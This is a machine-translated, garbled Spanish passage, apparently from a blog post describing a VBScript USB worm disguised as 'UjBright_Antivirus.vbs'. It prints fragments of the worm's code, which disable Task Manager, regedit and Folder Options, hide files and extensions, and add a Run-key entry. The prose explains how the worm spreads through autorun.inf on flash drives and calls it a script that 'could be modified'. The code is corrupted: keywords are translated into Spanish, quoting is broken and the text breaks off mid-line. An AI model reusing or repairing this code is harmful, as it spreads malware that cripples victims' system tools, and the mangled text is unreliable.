RegWrite" HKEY_CURRENT_USER \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Policies \\ Explorer \\ NoFolderOptions ", 1" REG_DWORD ".RegWrite" HKEY_CURRENT_USER \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Policies \\ Explorer \\ NoDriveTypeAutoRun ", 128," REG_DWORD ".RegWrite" HKEY_CURRENT_USER \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Policies \\ System \\ DisableRegistryTools ", 1" REG_DWORD ".
RegWrite" HKEY_CURRENT_USER \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Policies \\ System \\ DisableTaskMgr ", 1" REG_DWORD "End With Si tf ganar y" \\ UjBright_Antivirus.vbs "Entonces Si fso.Getfile (tf) .Drive.IsReady = false Entonces WScript. Salir Terminar si Wscript.Sleep 10.000 archivos Scary Wend grande no es la misma. Bueno, no tanto en realidad. Si ha programado con guiones antes, a continuación, que no será muy difícil conseguir esto. Después de ver el código por un tiempo, me di cuenta de lo que hizo.
Aquí es en pocas palabras: Se verificó la unidades flash Checked si la ejecución automática, léame y la escritura actual. Si no es así, escribe autorun.inf, copia de la escritura. Escriba la basura Léeme. Oculta las extensiones de archivo, desactiva regedit, etc sueño de 10000 segundos Así que en resumen se trataba de un pequeño script bonito que podría ser modificado. Usted puede ver las partes finales, donde el registro y tarea pesebre está desactivada, los archivos ocultos están ocultos, las extensiones están ocultas, etc .
RegWrite "HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Run \\ AutoMe", "wscript.exe" "" y ganar & "\\ UjBright_Antivirus.vbs" "" .RegWrite "HKEY_CURRENT_USER \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Explorer \\ Advanced \\ Oculto", 1 "REG_DWORD" .RegWrite "HKEY_CURRENT_USER \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Explorer \\ Advanced \\ HideFileExt ", 1" REG_DWORD ".RegWrite" HKEY_CURRENT_USER \\ SOFTWARE \\ Microsoft \\ Wi